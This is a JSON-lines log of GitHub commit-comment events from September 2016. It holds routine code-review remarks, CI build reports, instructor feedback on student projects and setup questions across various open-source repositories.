{"id":"4637683694","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224944,"position":20,"line":129,"path":"nodes/core/core/58-debug.html","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:41:22Z","updated_at":"2016-09-29T14:41:22Z","body":"!!"}},"created_at":"2016-09-29T14:41:22Z"}
{"id":"4637684363","type":"CommitCommentEvent","actor":{"login":"AngCM"},"repo":{"name":"AngCM/QualScheme"},"payload":{"comment":{"id":19224948,"position":null,"line":null,"path":null,"commit_id":"bd5891234246cd310019a781dca482077b21a3f3","created_at":"2016-09-29T14:41:28Z","updated_at":"2016-09-29T14:41:28Z","body":"Bottom file is a .psd containing all the reagent information for both pages. First page has each reagent on a separate layer, second page is all one layer"}},"created_at":"2016-09-29T14:41:28Z"}
{"id":"4637684500","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224950,"position":27,"line":136,"path":"nodes/core/core/58-debug.html","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:41:29Z","updated_at":"2016-09-29T14:41:29Z","body":"!!"}},"created_at":"2016-09-29T14:41:29Z"}
{"id":"4637685298","type":"CommitCommentEvent","actor":{"login":"Gutz-Pilz"},"repo":{"name":"rix1337/docker-rsscrawler"},"payload":{"comment":{"id":19224951,"position":null,"line":null,"path":null,"commit_id":"2304f4a5535d2c2625e5f5a38c80d6d3af979788","created_at":"2016-09-29T14:41:36Z","updated_at":"2016-09-29T14:41:36Z","body":"howto access the webserver ?\r\npulled the new docker. but now port is used "}},"created_at":"2016-09-29T14:41:36Z"}
{"id":"4637686518","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224954,"position":5,"line":31,"path":"red/api/locales/en-US/editor.json","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:41:48Z","updated_at":"2016-09-29T14:41:48Z","body":"!!"}},"created_at":"2016-09-29T14:41:48Z"}
{"id":"4637689680","type":"CommitCommentEvent","actor":{"login":"MarkusHiller"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19224966,"position":null,"line":null,"path":null,"commit_id":"dd1e57a7b7bfb61d1354b33735135b2fe9f3d807","created_at":"2016-09-29T14:42:16Z","updated_at":"2016-09-29T14:42:16Z","body":"Das Problem sollte sich durch https://github.com/MarkusHiller/OpenSoccer/commit/da3cc1cef8255d0d4845ee6b056e30ea7f5fe325 beheben."}},"created_at":"2016-09-29T14:42:16Z"}
{"id":"4637691234","type":"CommitCommentEvent","actor":{"login":"exhuma"},"repo":{"name":"inaz2/proxy2"},"payload":{"comment":{"id":19224971,"position":null,"line":null,"path":null,"commit_id":"a45862b6def371cc5828dd66f02b50a571ddc689","created_at":"2016-09-29T14:42:29Z","updated_at":"2016-09-29T14:42:29Z","body":"👍for Python 3 support\r\n👎 for replacing `%` formatting with `.format` in the same commit 😁"}},"created_at":"2016-09-29T14:42:29Z"}
{"id":"4637691967","type":"CommitCommentEvent","actor":{"login":"psykhx"},"repo":{"name":"psykhx/lapio-galleria"},"payload":{"comment":{"id":19224978,"position":null,"line":null,"path":null,"commit_id":"569a406c249ea41df3b9db2c8b6c63d9366aabea","created_at":"2016-09-29T14:42:35Z","updated_at":"2016-09-29T14:42:35Z","body":"New profile to add."}},"created_at":"2016-09-29T14:42:35Z"}
{"id":"4637702859","type":"CommitCommentEvent","actor":{"login":"miguelcleon"},"repo":{"name":"miguelcleon/ODM2-Admin"},"payload":{"comment":{"id":19225012,"position":null,"line":null,"path":null,"commit_id":"c7264ac5d3e107c80a51f22a3fca5220c61c0d62","created_at":"2016-09-29T14:44:09Z","updated_at":"2016-09-29T14:44:09Z","body":"@lsetiawan are you still working on updates for travis builds and pep8. I thought I'd try to update a file to try to clear some errors. "}},"created_at":"2016-09-29T14:44:09Z"}
{"id":"4637703478","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/final_project"},"payload":{"comment":{"id":19225014,"position":null,"line":null,"path":null,"commit_id":"a81265a65b6901ec4ddfd073541be1a8a65ffe5c","created_at":"2016-09-29T14:44:14Z","updated_at":"2016-09-29T14:44:14Z","body":"This is solid work, demonstrates a good grasp of the main concepts we covered in class and satisfies the requirements for the final project. However, if you're going to use this as a professional portfolio you need to give it a little more refinement. \r\n\r\n- Organize your JS and CSS files. Put all your html files at the same level of nesting and put the page specific JS and CSS in subfolders within your primary folders rather than CSS and JS folders within page folders. This will make your paths more predictable across files. \r\n- Modify the slideshow for mobile. One way you can pull this off is to check the value of window.innerWidth and see if you need to initialize the slideshow at all \r\n- Recreate your resume in CSS and include a PDF link at the bottom of that. This allows users to more quickly view your resume. \r\n\r\nBasically just keep refining it as you find things to improve. You can shoot me an email at stv.mnr@gmail.com when you're ready for me to take another look."}},"created_at":"2016-09-29T14:44:14Z"}
{"id":"4637716889","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225050,"position":null,"line":null,"path":null,"commit_id":"ae7695929c2b6168166e21513d862bd37b5f02d4","created_at":"2016-09-29T14:46:12Z","updated_at":"2016-09-29T14:46:12Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1197](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14559&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:10:15"}},"created_at":"2016-09-29T14:46:12Z"}
{"id":"4637725734","type":"CommitCommentEvent","actor":{"login":"mpjlu"},"repo":{"name":"srowen/spark"},"payload":{"comment":{"id":19225071,"position":12,"line":44,"path":"mllib/src/main/scala/org/apache/spark/mllib/feature/ChiSqSelector.scala","commit_id":"c0c0174e30a3e4473e0d5c4872c5b33144e5b015","created_at":"2016-09-29T14:47:28Z","updated_at":"2016-09-29T14:47:28Z","body":"can this be lazy，if it can be lazy will this be better than sort in fit. And not change the api there will be no mima incompatible 。acturally, it is not necessary to input sorted data, "}},"created_at":"2016-09-29T14:47:28Z"}
{"id":"4637725953","type":"CommitCommentEvent","actor":{"login":"lsetiawan"},"repo":{"name":"miguelcleon/ODM2-Admin"},"payload":{"comment":{"id":19225073,"position":null,"line":null,"path":null,"commit_id":"c7264ac5d3e107c80a51f22a3fca5220c61c0d62","created_at":"2016-09-29T14:47:30Z","updated_at":"2016-09-29T14:47:30Z","body":"@miguelcleon I haven't had a chance to focus on ODM2-Admin much this week. I'll get to it probably tomorrow. Thanks. :)"}},"created_at":"2016-09-29T14:47:30Z"}
{"id":"4637726864","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225075,"position":null,"line":null,"path":null,"commit_id":"ae7695929c2b6168166e21513d862bd37b5f02d4","created_at":"2016-09-29T14:47:39Z","updated_at":"2016-09-29T14:47:39Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1198](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14564&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:09:18"}},"created_at":"2016-09-29T14:47:39Z"}
{"id":"4637731107","type":"CommitCommentEvent","actor":{"login":"randsina"},"repo":{"name":"glebmikulko/callboard"},"payload":{"comment":{"id":19225090,"position":5,"line":5,"path":"db/migrate/20160929125941_create_join_table_post_category.rb","commit_id":"f97bbfcee0c5cce96315e22e47f590a6d23611e7","created_at":"2016-09-29T14:48:17Z","updated_at":"2016-09-29T14:48:17Z","body":"почему индексы закомментированы?"}},"created_at":"2016-09-29T14:48:17Z"}
{"id":"4637731670","type":"CommitCommentEvent","actor":{"login":"JTIRAT"},"repo":{"name":"cmoulton/grokTableViewBackground"},"payload":{"comment":{"id":19225093,"position":null,"line":null,"path":null,"commit_id":"667c8811a065ec790764539653f0f09539727a41","created_at":"2016-09-29T14:48:22Z","updated_at":"2016-09-29T14:48:22Z","body":"Could you update as swift 3 and XCODE 8?"}},"created_at":"2016-09-29T14:48:22Z"}
{"id":"4637732144","type":"CommitCommentEvent","actor":{"login":"rix1337"},"repo":{"name":"rix1337/docker-rsscrawler"},"payload":{"comment":{"id":19225095,"position":null,"line":null,"path":null,"commit_id":"2304f4a5535d2c2625e5f5a38c80d6d3af979788","created_at":"2016-09-29T14:48:26Z","updated_at":"2016-09-29T14:48:26Z","body":"docker run -d \\```\r\n  --name=\"RSScrawler\" \\\r\n  -p port:9090 \\\r\n  -v /path/to/config/:/config:rw \\\r\n  -v /path/to/jdownloader2/:/jd2:rw \\\r\n  rix1337/docker-rsscrawler"}},"created_at":"2016-09-29T14:48:26Z"}
{"id":"4637739186","type":"CommitCommentEvent","actor":{"login":"carl-j-love"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19225115,"position":null,"line":null,"path":null,"commit_id":"806e00434c34aa6c3911c2148292902f2782ffdb","created_at":"2016-09-29T14:49:25Z","updated_at":"2016-09-29T14:49:25Z","body":"I wanted the args that get passed to disint to be either:\n1) just the measure (the 1st arg), in which case the diff var and ctx take\ndefault values, or\n2) a list that is entered into the code in the same place as the measure.\n\nWith the old way, the ctx needed to be entered in a different place than\nthe first arg. With the necessary addition of a way and a place to enter\nthe diff var(s), it was getting too complicated.\n\nOn Thu, Sep 29, 2016 at 7:29 AM, Jacques Carette <notifications@github.com>\nwrote:\n\n> Why did you remove the handling of ctx from TestDisint ???\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hakaru-dev/hakaru/commit/806e00434c34aa6c3911c2148292902f2782ffdb#commitcomment-19222211>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASYo9RPKAOIMg30mH1lyqyV3kq8YIOlNks5qu6EGgaJpZM4KJ4Sj>\n> .\n>\n"}},"created_at":"2016-09-29T14:49:25Z"}
{"id":"4637739345","type":"CommitCommentEvent","actor":{"login":"leezer3"},"repo":{"name":"leezer3/bvec_ats"},"payload":{"comment":{"id":19225117,"position":null,"line":null,"path":null,"commit_id":"34d687a61bc41fd535d9ec0245d078b2ef6ae78a","created_at":"2016-09-29T14:49:27Z","updated_at":"2016-09-29T14:49:27Z","body":"Note: This bumps the openBVE API version to that of the http://www.openbve-project.net builds."}},"created_at":"2016-09-29T14:49:27Z"}
{"id":"4637742773","type":"CommitCommentEvent","actor":{"login":"miguelcleon"},"repo":{"name":"miguelcleon/ODM2-Admin"},"payload":{"comment":{"id":19225125,"position":null,"line":null,"path":null,"commit_id":"c7264ac5d3e107c80a51f22a3fca5220c61c0d62","created_at":"2016-09-29T14:49:57Z","updated_at":"2016-09-29T14:49:57Z","body":"ok sounds good. "}},"created_at":"2016-09-29T14:49:57Z"}
{"id":"4637747095","type":"CommitCommentEvent","actor":{"login":"AnacondaPython"},"repo":{"name":"tangycode/tangycode.github.io"},"payload":{"comment":{"id":19225142,"position":null,"line":null,"path":null,"commit_id":"420059486527fd35884b0a3bc1d62d7d437194a2","created_at":"2016-09-29T14:50:36Z","updated_at":"2016-09-29T14:50:36Z","body":"successful results on origin push. Don't merge source to master"}},"created_at":"2016-09-29T14:50:36Z"}
{"id":"4637748921","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19225147,"position":null,"line":null,"path":null,"commit_id":"80da206ca69a278e546f94f1cac94dba0bff3103","created_at":"2016-09-29T14:50:52Z","updated_at":"2016-09-29T14:50:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1199](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14565&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:11:01"}},"created_at":"2016-09-29T14:50:52Z"}
{"id":"4637752494","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"ProximoSrl/Jarvis.DocumentStore"},"payload":{"comment":{"id":19225161,"position":null,"line":null,"path":null,"commit_id":"aa7b43d1ca16f9d5de4e98339057368ba7301ee2","created_at":"2016-09-29T14:51:23Z","updated_at":"2016-09-29T14:51:23Z","body":"TeamCity Jarvis :: Jarvis.DocumentStore :: GitFlow Debug / Test / Release [Build 90](http://build.prxm.it:8811/viewLog.html?buildId=9848&buildTypeId=Jarvis_DocumentStore_GitVersion) is now running\n"}},"created_at":"2016-09-29T14:51:23Z"}
{"id":"4637757459","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19225174,"position":17,"line":213,"path":"templates/partials/contacts_content.html","commit_id":"eccaae2055f094778b7e3be68776b6bb1ba1c16a","created_at":"2016-09-29T14:52:07Z","updated_at":"2016-09-29T14:52:07Z","body":"yeah agree... Is `reportsTimeWindowMonths` better? (`numMonthsInThePastForReportsTimeWindow` sounds a bit too much)"}},"created_at":"2016-09-29T14:52:07Z"}
{"id":"4637759748","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19225179,"position":null,"line":null,"path":null,"commit_id":"3a9acebe5c525978872eb22aa1f37245a1d428d3","created_at":"2016-09-29T14:52:26Z","updated_at":"2016-09-29T14:52:26Z","body":"<div>\r\n<div>\r\n<h3>\r\n<div>\r\n\r\nis not semantic, see https://bugs.limesurvey.org/view.php?id=10894"}},"created_at":"2016-09-29T14:52:26Z"}
{"id":"4637764754","type":"CommitCommentEvent","actor":{"login":"AlexOugh"},"repo":{"name":"SungardAS/aws-services"},"payload":{"comment":{"id":19225196,"position":38,"line":136,"path":"cloudformation/iam_federation.js","commit_id":"dcf595133255e50090859f80e7f719a1391e86f5","created_at":"2016-09-29T14:53:08Z","updated_at":"2016-09-29T14:53:08Z","body":"here, statement can be a non array because 'if' has other conditions not only 'is string'."}},"created_at":"2016-09-29T14:53:08Z"}
{"id":"4637768078","type":"CommitCommentEvent","actor":{"login":"norkans7"},"repo":{"name":"nyaruka/rapidpro"},"payload":{"comment":{"id":19225200,"position":5,"line":1909,"path":"temba/api/tests/test_v2.py","commit_id":"f3b3ccc0fcccfd51a37ca6e3608efd0a1ec92bb9","created_at":"2016-09-29T14:53:39Z","updated_at":"2016-09-29T14:53:39Z","body":"Actually this was wrong, Queryset.update does not trigger auto_now on fields, I reverted this commit"}},"created_at":"2016-09-29T14:53:39Z"}
{"id":"4637768763","type":"CommitCommentEvent","actor":{"login":"FrechMax"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19225202,"position":52,"line":52,"path":"plugins/de.ovgu.featureide.fm.ui/src/de/ovgu/featureide/fm/ui/editors/featuremodel/actions/FoldInAction.java","commit_id":"1d5d9ffdfba0969358a2a263073f811a5b2505be","created_at":"2016-09-29T14:53:44Z","updated_at":"2016-09-29T14:53:44Z","body":"Description missing :-1: "}},"created_at":"2016-09-29T14:53:44Z"}
{"id":"4637769936","type":"CommitCommentEvent","actor":{"login":"miguelcobain"},"repo":{"name":"xcambar/ember-cli-is-component"},"payload":{"comment":{"id":19225205,"position":null,"line":null,"path":null,"commit_id":"148334abb003b6adda2acdb612699adb5e5bbd38","created_at":"2016-09-29T14:53:55Z","updated_at":"2016-09-29T14:53:55Z","body":"This is probably worth a release for folks already in glimmer 2 land. :)\r\nI'm an avid user of this addon! :+1: "}},"created_at":"2016-09-29T14:53:55Z"}
{"id":"4637770412","type":"CommitCommentEvent","actor":{"login":"AlexOugh"},"repo":{"name":"SungardAS/aws-services"},"payload":{"comment":{"id":19225206,"position":19,"line":128,"path":"cloudformation/iam_federation.js","commit_id":"dcf595133255e50090859f80e7f719a1391e86f5","created_at":"2016-09-29T14:53:59Z","updated_at":"2016-09-29T14:53:59Z","body":"We may just remove this and update the statement."}},"created_at":"2016-09-29T14:53:59Z"}
{"id":"4637775156","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"hunterdt/Final-Final-Project"},"payload":{"comment":{"id":19225216,"position":null,"line":null,"path":null,"commit_id":"a94aec644be0234bd5e1d341bb1d57fbb20c5bca","created_at":"2016-09-29T14:54:40Z","updated_at":"2016-09-29T14:54:40Z","body":"There are too many files in this commit for me to comment on individual files. So I'll summarize here. This satisfies the requirements for the final project. Try to keep large files like pdfs and images out of your github. Not only do you risk displaying confidential information, but the size of your repository will suffer as a result. Your CSS and JS are well organized and lucid. The JS features you chose to implement are ambitious without being unrealistic. You have a real knack for JS and I encourage you to continue to study and find ways to practice. "}},"created_at":"2016-09-29T14:54:40Z"}
{"id":"4637775991","type":"CommitCommentEvent","actor":{"login":"Gutz-Pilz"},"repo":{"name":"rix1337/docker-rsscrawler"},"payload":{"comment":{"id":19225218,"position":null,"line":null,"path":null,"commit_id":"2304f4a5535d2c2625e5f5a38c80d6d3af979788","created_at":"2016-09-29T14:54:48Z","updated_at":"2016-09-29T14:54:48Z","body":"TOP! Auch das Interface ist schön schlicht! Super!\r\nkannst du beim log noch die Millisekunden raus nehmen ?"}},"created_at":"2016-09-29T14:54:48Z"}
{"id":"4637777000","type":"CommitCommentEvent","actor":{"login":"Chocimier"},"repo":{"name":"Chocimier/vcmi"},"payload":{"comment":{"id":19225221,"position":null,"line":null,"path":null,"commit_id":"381882b6d8b20998aa5abda1cb15618e48ea8a9f","created_at":"2016-09-29T14:54:57Z","updated_at":"2016-09-29T14:54:57Z","body":"I find out it's because sending pack during processing of other pack. Is there a way to handle this?\n"}},"created_at":"2016-09-29T14:54:57Z"}
{"id":"4637779375","type":"CommitCommentEvent","actor":{"login":"andre-merzky"},"repo":{"name":"radical-cybertools/radical.analytics"},"payload":{"comment":{"id":19225228,"position":6,"line":64,"path":"examples/02_session_get_rp.py","commit_id":"6ba1655550d4f81739b8a1240c36f62b1b740cfa","created_at":"2016-09-29T14:55:17Z","updated_at":"2016-09-29T14:55:17Z","body":"This probably should then also print `pilots`?"}},"created_at":"2016-09-29T14:55:17Z"}
{"id":"4637780585","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19225230,"position":null,"line":null,"path":null,"commit_id":"1a9714483ac527ec3f65b9c135bae8717851e403","created_at":"2016-09-29T14:55:26Z","updated_at":"2016-09-29T14:55:26Z","body":"input_processor_refactor (mbadams5) - x86_64-MacOS-10.9-clang: Tests Failed (1820 of 2361 tests passed, 21 test warnings)\n\n * 505 tests had: AUD diffs.\n * 488 tests had: EIO diffs.\n * 468 tests had: Table big diffs.\n * 210 tests had: RDD diffs.\n * 134 tests had: ERR diffs.\n * 365 tests had: MTD diffs.\n * 269 tests had: DXF diffs.\n * 1 test had: S...\n * 386 tests had: SHD diffs.\n * 404 tests had: BND diffs.\n * 293 tests had: MDD diffs.\n * 185 tests had: SSZ big diffs.\n * 14 tests had: ESO big diffs.\n * 9 tests had: MTR big diffs.\n * 9 tests had: ZSZ small diffs.\n * 28 tests had: ESO small diffs.\n * 22 tests had: MTR small diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 1 test had: M...\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a9714483ac527ec3f65b9c135bae8717851e403-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a9714483ac527ec3f65b9c135bae8717851e403-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-77.09%25-red.svg)</a> \n"}},"created_at":"2016-09-29T14:55:26Z"}
{"id":"4637785906","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19225243,"position":null,"line":null,"path":null,"commit_id":"52fa7e43df232cb8d01e18cca5b2ccb8e507d055","created_at":"2016-09-29T14:56:16Z","updated_at":"2016-09-29T14:56:16Z","body":"No, just the text-center ;) but never mind about this one, it's really a Point Of View :) there are no issue ."}},"created_at":"2016-09-29T14:56:16Z"}
{"id":"4637787499","type":"CommitCommentEvent","actor":{"login":"SonalOjha"},"repo":{"name":"SungardAS/aws-services"},"payload":{"comment":{"id":19225246,"position":38,"line":136,"path":"cloudformation/iam_federation.js","commit_id":"dcf595133255e50090859f80e7f719a1391e86f5","created_at":"2016-09-29T14:56:29Z","updated_at":"2016-09-29T14:56:29Z","body":"We are checking the type of statement in the above if condition, that should be handled in above condition"}},"created_at":"2016-09-29T14:56:29Z"}
{"id":"4637787741","type":"CommitCommentEvent","actor":{"login":"KishoreKumarOjha1986"},"repo":{"name":"KishoreKumarOjha1986/gittest"},"payload":{"comment":{"id":19225247,"position":null,"line":null,"path":null,"commit_id":"d82cb93ab3656d629259b8a96e284066db882826","created_at":"2016-09-29T14:56:32Z","updated_at":"2016-09-29T14:56:32Z","body":"This is from Github"}},"created_at":"2016-09-29T14:56:32Z"}
{"id":"4637790722","type":"CommitCommentEvent","actor":{"login":"kgilpin"},"repo":{"name":"conjurinc/api-python"},"payload":{"comment":{"id":19225258,"position":45,"line":22,"path":"examples/petstore/docker-compose.yml","commit_id":"a354f54538c8fd8468addc2f0ad1c35d85570b8d","created_at":"2016-09-29T14:56:56Z","updated_at":"2016-09-29T14:56:56Z","body":"Ok but I still think there should be a way to run this using only\ncontainers. That will make this much easier for me to verify, and to run in\nJenkins. Because we should verify that our examples work.\n\nOn Thu, Sep 29, 2016 at 10:34 AM Dustin Collins <notifications@github.com>\nwrote:\n\n> I understand what you're trying to do here, get rid of the Python\n> dependency. But this example is for Python programmers - moving everything\n> into Docker makes the example (how its parts fit together) much harder to\n> understand.\n>\n> I propose instead that I add a note to the README showing how to set up a\n> virtualenv for this example (which almost all Python devs know how to do).\n> That will isolate the Python environment\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/conjurinc/api-python/commit/a354f54538c8fd8468addc2f0ad1c35d85570b8d#commitcomment-19224795>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAFRe_qDM04g1NAjYb-o609BqzKsLBEeks5qu8xigaJpZM4KKELX>\n> .\n>\n"}},"created_at":"2016-09-29T14:56:56Z"}
{"id":"4637795999","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19225279,"position":null,"line":null,"path":null,"commit_id":"3a9acebe5c525978872eb22aa1f37245a1d428d3","created_at":"2016-09-29T14:57:42Z","updated_at":"2016-09-29T14:57:42Z","body":"PS : if i don't make error : this must be moved to views to be moved to twig in LS4 or 5 ?"}},"created_at":"2016-09-29T14:57:42Z"}
{"id":"4637796020","type":"CommitCommentEvent","actor":{"login":"rix1337"},"repo":{"name":"rix1337/docker-rsscrawler"},"payload":{"comment":{"id":19225280,"position":null,"line":null,"path":null,"commit_id":"2304f4a5535d2c2625e5f5a38c80d6d3af979788","created_at":"2016-09-29T14:57:43Z","updated_at":"2016-09-29T14:57:43Z","body":"Hab jetzt mal die docker run Infos ergänzt.. Nutze selber das Unraid docker GUI, daher habe ich nie den Befehl eingeben müssen.\r\n\r\nIch freue mich über Feedback. Das Back- und FrontEnd ist komplett selbst gebastelt (im Wortsinn). Werde das kontinuierlich zu verbesser versuchen. Habe aber kaum Erfahrung mit derlei Anwendungsarten. Wenn irgendwo Fehler auftreten: ab damit in die Issues!\r\n\r\nDie Millisekundengeschichte hatte ich schon einmal versucht zu entfernen. Ich geb mein Bestes.\r\n\r\nViel Spaß damit."}},"created_at":"2016-09-29T14:57:43Z"}
{"id":"4637796581","type":"CommitCommentEvent","actor":{"login":"SonalOjha"},"repo":{"name":"SungardAS/aws-services"},"payload":{"comment":{"id":19225283,"position":19,"line":128,"path":"cloudformation/iam_federation.js","commit_id":"dcf595133255e50090859f80e7f719a1391e86f5","created_at":"2016-09-29T14:57:47Z","updated_at":"2016-09-29T14:57:47Z","body":"yeah, will make that change"}},"created_at":"2016-09-29T14:57:47Z"}
{"id":"4637801851","type":"CommitCommentEvent","actor":{"login":"pmcatominey"},"repo":{"name":"hashicorp/terraform"},"payload":{"comment":{"id":19225304,"position":null,"line":null,"path":null,"commit_id":"392f634ff492445770be91f07456cff387c80cdd","created_at":"2016-09-29T14:58:33Z","updated_at":"2016-09-29T14:58:33Z","body":"I believe this may have reverted the fix in #5878"}},"created_at":"2016-09-29T14:58:33Z"}
{"id":"4637802275","type":"CommitCommentEvent","actor":{"login":"JasonLantz"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19225306,"position":79,"line":79,"path":"src/js/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-29T14:58:37Z","updated_at":"2016-09-29T14:58:37Z","body":"Thanks again for all the feedback Jon and Mallory...   very helpful.\n\nSent from my iPad\n\n> On Sep 29, 2016, at 7:25 AM, Mallory <notifications@github.com> wrote:\n> \n> We don't need to remove the tabbability of the opening/trigger button when opening the modal. Instead, focus gets moved upon opening to the first focusable in the modal (usually the close button, but it can be the first input if it's mostly a form, or an ok/cancel button if it's a text dialog), and then with the opening of the modal, focus gets trapped.\n> \n> Two ways I know of to trap: one is set listeners on the first and last focusables in the modal, check if shift accompanied tab, and move to the other one where appropriate. This does not work on UAs where users use other methods of moving keyboard focus, like Opera's Presto engine with spatial navigation, but oh well...\n> The other is to listen to all things on the document (potentially expensive) and if they receive focus, check if they have an ancestor that === the modal. If not, focus gets manually put back inside the modal (first focusable). I haven't had good success with this one but it might be the better way to go as it could catch screen readers' virtual focus dropping to a focusable (they can always \"read\" out of modals unless aria-hidden is placed on the whole rest of the page) and then clicking Enter.\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-29T14:58:37Z"}
{"id":"4637803512","type":"CommitCommentEvent","actor":{"login":"significant-bit"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19225308,"position":5,"line":882,"path":"source/blender/gpu/intern/gpu_material.c","commit_id":"6fd5bef633891256d24b3598beb75bade39a3770","created_at":"2016-09-29T14:58:49Z","updated_at":"2016-09-29T14:58:49Z","body":"would like parentheses around (mtex->tex->type & TEX_IMAGE) for clarity / readability"}},"created_at":"2016-09-29T14:58:49Z"}
{"id":"4637809134","type":"CommitCommentEvent","actor":{"login":"tbfleming"},"repo":{"name":"openhardwarecoza/LaserWeb4"},"payload":{"comment":{"id":19225329,"position":null,"line":null,"path":null,"commit_id":"28e35bcd683316fca3fc6e6e11d0d086d86cd99d","created_at":"2016-09-29T14:59:35Z","updated_at":"2016-09-29T14:59:35Z","body":"Any chance we could put dist/ and doc/ in a separate repository? GitHub doesn't behave nicely with large files which change often, especially in diffs. e.g. There's a large lag while I type this."}},"created_at":"2016-09-29T14:59:35Z"}
{"id":"4637811294","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"donflora/final-project"},"payload":{"comment":{"id":19225334,"position":128,"line":128,"path":"css/style.css","commit_id":"fbef8d011a6dd28d0e0a6bcb9dff98275e1e2a92","created_at":"2016-09-29T14:59:53Z","updated_at":"2016-09-29T14:59:53Z","body":"Try to use em and rem values - they're better for responsive designs. "}},"created_at":"2016-09-29T14:59:53Z"}
{"id":"4637815267","type":"CommitCommentEvent","actor":{"login":"crishernandezmaps"},"repo":{"name":"crishernandezmaps/liqen-medialab"},"payload":{"comment":{"id":19225348,"position":null,"line":null,"path":null,"commit_id":"dc5397cf9fbf952c311751e5b69eb9aa9042416a","created_at":"2016-09-29T15:00:26Z","updated_at":"2016-09-29T15:00:26Z","body":"Sound"}},"created_at":"2016-09-29T15:00:26Z"}
{"id":"4637819638","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"donflora/final-project"},"payload":{"comment":{"id":19225353,"position":360,"line":360,"path":"css/style.css","commit_id":"fbef8d011a6dd28d0e0a6bcb9dff98275e1e2a92","created_at":"2016-09-29T15:01:04Z","updated_at":"2016-09-29T15:01:04Z","body":"use border"}},"created_at":"2016-09-29T15:01:04Z"}
{"id":"4637820837","type":"CommitCommentEvent","actor":{"login":"Anteru"},"repo":{"name":"baldurk/renderdoc"},"payload":{"comment":{"id":19225357,"position":60,"line":3776,"path":"renderdoc/driver/d3d11/d3d11_analyse.cpp","commit_id":"b01be4bae7550c3f55964f46f1bd51d842efe4be","created_at":"2016-09-29T15:01:14Z","updated_at":"2016-09-29T15:01:14Z","body":"there is a `hr` already in this scope - remove the `HRESULT` or you're introducing a new variable which shadows the other `hr`."}},"created_at":"2016-09-29T15:01:14Z"}
